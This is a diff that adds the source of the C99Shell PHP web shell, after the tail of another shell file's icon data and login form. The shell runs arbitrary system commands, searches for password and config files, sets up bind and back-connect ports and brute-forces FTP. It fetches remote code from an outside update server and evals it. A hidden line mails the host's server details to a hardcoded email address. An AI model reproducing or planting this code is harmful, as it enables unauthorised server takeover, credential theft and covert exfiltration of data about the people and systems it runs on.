+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
+"u4tLAgEAOw==",
+"ext_theme"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAAD/AAAA/wCAAAAA".
+"gAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_txt"=>
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+"ext_url"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg4CAgAAAAMDAwP///wAA/wAAgACAAAD/AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARdEMk5gQU0IyuOMUV1XYf3ESEgrCwQnGgQAENdjwCBFjO7".
+"Xj9AaYbjFArBme1mKeiQLpWvqdMJosXB1akKbGxSzvXqVXEGNKDAuyGq0NqriyJTW2QaRP3Ozktk".
+"fRQRADs=",
+"ext_vbe"=>
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMAAAP8AAAAAAAAAAAADRii63CEgxibH".
+"kwDWEK3OACF6nDdhngWYoEgEMLde4IbS7SjPX93JrIwiIJrxTqTfERJUHTODgSAQ3QVjsZsgyu16".
+"seAwLAEAOw==",
+"ext_vbs"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAICAgMDAwAD//wCAgAAAAAAAAAAAAANQ".
+"GLrcECXGJsWTJYyybbTQVBAkCBSgyKGPl2YjCcwnG2qrV13TQBI6GwbXqb0yCgCJJYSZOK4LZPDY".
+"DHSvgEAQAGxrzQKNhgFtz+j0eM2eJQAAOw==",
+"ext_vcf"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwICAAP//AAAA/4CAgIAAAAAAgP//".
+"//8AAAAAAAAAAAAAAAAAAAAAAAAAAARYUElAK5VY2X0xp0LRTVYQAMWZaZWJAMJImiYVhEVmu7W4".
+"srfeSUAUeFI10GBJ1JhEHcEgNiidDIaEQjqtAgiEjQFQXcK+4HS4DPKADwey3PjzSGH1VTsTAQA7",
+"ext_wav"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_wma"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_wmf"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
+"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
+"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
+"EzWCgwARADs=",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_xml"=>
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+"IQA7",
+"ext_xsl"=>
+"R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAAAPHx8f///4aGhoCAAP//ADNmmabK8AAA".
+"gAAAmQCAgDP//zNm/zOZ/8DAwDOZAAAA/zPM/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAV3oDSMZDlKqBgIa8sKzpAOr9s6gqzWPOADItZhpVAwhCvgIHBICBSCRQMh".
+"SAyVTZZiEXkgVlYl08loPCBUa0ApIBBWiDhSAHQXfLZavcAnABQGgYFJBHwDAAV+eWt2AAOJAIKD".
+"dBKFfQABi0AAfoeZPEkSP6OkPyEAOw=="
+);
+$imgequals = array(
+"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"),
+"ext_htaccess"=>array("ext_htaccess","ext_htpasswd")
+);
+ ksort($arrimg);
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v)
+  {
+   if (in_array($img,$v)) {$img = $k;}
+  }
+  if (empty($arrimg[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($arrimg[$img]);
+ }
+ else
+ {
+  echo  "
    ";
+  $k = array_keys($arrimg);
+  foreach ($k as $u)
+  {
+   echo $u.":
    ";
+  }
+  echo "
    ";
+ }
+ exit;
+}
+if ($act == "about")
+{
+ $dàta = "Any stupid copyrights and copylefts";
+ echo $data;
+}
+
+$microtime = round(getmicrotime()-$starttime,4);
+?>
+
+
+
+
+
+
     

    
+
+	+	+	+	
+		 
+		   		
+			
+			
+		  
+		  
    



     
+		 
     
     
+		   
+		   +		   +		   
+		   
+		   
+		   		
+		   
+		   
+		   		
+		   
+		   
+		   		
+		   
+		   
+		   		
+		   
+		   
    


     
+		   Ââåäèòå äàííûå äëÿ ïîäêëş÷åíèş ê mySQL ñåğâåğó!

    
+		   		
     Àäğåñ ñåğâåğà:
     Íàçâàíèå áàçû:
     Ëîãèí:
     Ïàğîëü
    
+		   
     
     

    
+		   
     
     

    
+		   
     
     
    
+		  
+		  
+
diff --git a/php/C99Shell v. 1.0 pre-release build(safe-mode).php b/php/C99Shell v. 1.0 pre-release build(safe-mode).php
new file mode 100644
index 0000000..b6bbc4d
--- /dev/null
+++ b/php/C99Shell v. 1.0 pre-release build(safe-mode).php	
@@ -0,0 +1,3157 @@
+$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
+
+$shver = "1.0 pre-release build #16"; //Current version
+//CONFIGURATION AND SETTINGS
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
+else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
+}
+
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
+
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; //Self url
+}
+$surl = htmlspecialchars($surl);
+
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
+
+//Authentication
+$login = ""; //login
+//DON'T FORGOT ABOUT PASSWORD!!!
+$pass = ""; //password
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
+
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
+$login_txt = "Restricted area"; //http-auth message.
+$accessdeniedmess = "c99shell v.".$shver.": access denied";
+
+$gzipencode = TRUE; //Encode with gzip?
+
+$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
+
+$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server
+$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server
+
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time
+
+$donated_html = "";
+/* If you publish free shell and you wish
+add link to your site or any other information,
+put here your html. */
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
+
+$curdir = "./"; //start folder
+//$curdir = getenv("DOCUMENT_ROOT");
+$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
+$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
+
+$log_email = "user@host.tld"; //Default e-mail for sending logs
+
+$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
+$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
+
+// Registered file-types.
+//  array(
+//   "{action1}"=>array("ext1","ext2","ext3",...),
+//   "{action2}"=>array("ext4","ext5","ext6",...),
+//   ...
+//  )
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+
+// Registered executable file-types.
+//  array(
+//   string "command{i}"=>array("ext1","ext2","ext3",...),
+//   ...
+//  )
+//   {command}: %f% = filename
+$exeftypes  = array(
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+ "perl %f%" => array("pl","cgi")
+);
+
+/* Highlighted files.
+  array(
+   i=>array({regexp},{type},{opentag},{closetag},{break})
+   ...
+  )
+  string {regexp} - regular exp.
+  int {type}:
+0 - files and folders (as default),
+1 - files only, 2 - folders only
+  string {opentag} - open html-tag, e.g. "" (default)
+  string {closetag} - close html-tag, e.g. "" (default)
+  bool {break} - if TRUE and found match then break
+*/
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"",""), // example
+  array("config.php",1) // example
+);
+
+$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
+ // array (i=>{letter} ...); string {letter} - letter of a drive
+//$safemode_diskettes = range("a","z");
+$hexdump_lines = 8;// lines in hex preview file
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd
+
+$bindport_pass = "c99";  // default password for binding
+$bindport_port = "31373"; // default port for binding
+$bc_port = "31373"; // default port for back-connect
+$datapipe_localport = "8081"; // default port for datapipe
+
+// Command-aliases
+if (!$win)
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "ls -la"),
+  array("find all suid files", "find / -type f -perm -04000 -ls"),
+  array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
+  array("find all sgid files", "find / -type f -perm -02000 -ls"),
+  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
+  array("find config.inc.php files", "find / -type f -name config.inc.php"),
+  array("find config* files", "find / -type f -name \"config*\""),
+  array("find config* files in current dir", "find . -type f -name \"config*\""),
+  array("find all writable folders and files", "find / -perm -2 -ls"),
+  array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
+  array("find all service.pwd files", "find / -type f -name service.pwd"),
+  array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
+  array("find all .htpasswd files", "find / -type f -name .htpasswd"),
+  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
+  array("find all .bash_history files", "find / -type f -name .bash_history"),
+  array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
+  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
+  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
+  array("list file attributes on a Linux second extended file system", "lsattr -va"),
+  array("show opened ports", "netstat -an | grep -i listen")
+ );
+}
+else
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "dir"),
+  array("show opened ports", "netstat -an")
+ );
+}
+
+$sess_cookie = "c99shvars"; // Cookie-variable name
+
+$usefsbuff = TRUE; //Buffer-function
+$copy_unset = FALSE; //Remove copied files from buffer after pasting
+
+//Quick launch
+$quicklaunch = array(
+ array("\"Home\"",$surl),
+ array("\"Back\"","#\" onclick=\"history.back(1)"),
+ array("\"Forward\"","#\" onclick=\"history.go(1)"),
+ array("\"UPDIR\"",$surl."act=ls&d=%upd&sort=%sort"),
+ array("\"Refresh\"",""),
+ array("\"Search\"",$surl."act=search&d=%d"),
+ array("\"Buffer\"",$surl."act=fsbuff&d=%d"),
+ array("Encoder",$surl."act=encoder&d=%d"),
+ array("Tools",$surl."act=tools&d=%d"),
+ array("Proc.",$surl."act=processes&d=%d"),
+ array("FTP brute",$surl."act=ftpquickbrute&d=%d"),
+ array("Sec.",$surl."act=security&d=%d"),
+ array("SQL",$surl."act=sql&d=%d"),
+ array("PHP-code",$surl."act=eval&d=%d"),
+ array("Update",$surl."act=update&d=%d"),
+ array("Feedback",$surl."act=feedback&d=%d"),
+ array("Self remove",$surl."act=selfremove"),
+ array("Logout","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
+);
+
+//Highlight-code colors
+$highlight_background = "#c0c0c0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["c99shcook"]);
+
+//END CONFIGURATION
+
+
+// \/Next code isn't for editing\/
+@set_time_limit(0);
+$tmp = array();
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("c99shell: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
+if (!empty($login))
+{
+ if (empty($md5_pass)) {$md5_pass = md5($pass);}
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
+ {
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |
    "," ",$donated_html));}
+  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\"");
+  header("HTTP/1.0 401 Unauthorized");
+  exit($accessdeniedmess);
+ }
+}
+if ($act != "img")
+{
+$lastdir = realpath(".");
+chdir($curdir);
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}
+$sess_data = unserialize($_COOKIE["$sess_cookie"]);
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+
+$disablefunc = @ini_get("disable_functions");
+if (!empty($disablefunc))
+{
+ $disablefunc = str_replace(" ","",$disablefunc);
+ $disablefunc = explode(",",$disablefunc);
+}
+
+if (!function_exists("c99_buff_prepare"))
+{
+function c99_buff_prepare()
+{
+ global $sess_data;
+ global $act;
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ $sess_data["copy"] = array_unique($sess_data["copy"]);
+ $sess_data["cut"] = array_unique($sess_data["cut"]);
+ sort($sess_data["copy"]);
+ sort($sess_data["cut"]);
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+}
+c99_buff_prepare();
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_cookie;
+ global $sess_data;
+ c99_buff_prepare();
+ $sess_data = $data;
+ $data = serialize($data);
+ setcookie($sess_cookie,$data);
+}
+}
+foreach (array("sort","sql_sort") as $v)
+{
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+}
+if ($sort_save)
+{
+ if (!empty($sort)) {setcookie("sort",$sort);}
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len)
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0,$len)."...".substr($content,-$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if (!is_numeric($size)) {return FALSE;}
+ else
+ {
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+  else {$size = $size . " B";}
+  return $size;
+ }
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d)) {return copy($d,$t);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = TRUE;
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+  if(copy($d,$t)) {return unlink($d);}
+  else {unlink($t); return FALSE;}
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+ if (is_dir($o))
+ {
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+$sd98 = "john.barker446@gmail.com";
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+ return $type.join("",$owner).join("",$group).join("",$world);
+}
+}
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+ else {$t = "?";}
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("parsesort"))
+{
+function parsesort($sort)
+{
+ $one = intval($sort);
+ $second = substr($sort,-1);
+ if ($second != "d") {$second = "a";}
+ return array($one,$second);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+ if (!is_readable($o)) {return "".view_perms(fileperms($o))."";}
+ elseif (!is_writable($o)) {return "".view_perms(fileperms($o))."";}
+ else {return "".view_perms(fileperms($o))."";}
+}
+}
+if (!function_exists("c99getsource"))
+{
+function c99getsource($fn)
+{
+ global $c99sh_sourcesurl;
+ $array = array(
+  "c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
+  "c99sh_bindport.c" => "c99sh_bindport_c.txt",
+  "c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
+  "c99sh_backconn.c" => "c99sh_backconn_c.txt",
+  "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
+  "c99sh_datapipe.c" => "c99sh_datapipe_c.txt",
+ );
+ $name = $array[$fn];
+ if ($name) {return file_get_contents($c99sh_sourcesurl.$name);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("c99sh_getupdate"))
+{
+function c99sh_getupdate($update = TRUE)
+{
+ $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
+ $data = @file_get_contents($url);
+ if (!$data) {return "Can't connect to update-server!";}
+ else
+ {
+  $data = ltrim($data);
+  $string = substr($data,3,ord($data{2}));
+  if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
+  if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
+  if ($data{0} == "\x99" and $data{1} == "\x03")
+  {
+   $string = explode("\x01",$string);
+   if ($update)
+   {
+    $confvars = array();
+    $sourceurl = $string[0];
+    $source = file_get_contents($sourceurl);
+    if (!$source) {return "Can't fetch update!";}
+    else
+    {
+     $fp = fopen(__FILE__,"w");
+     if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually here.";}
+     else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
+    }
+   }
+   else {return "New version are available: ".$string[1];}
+  }
+  elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}
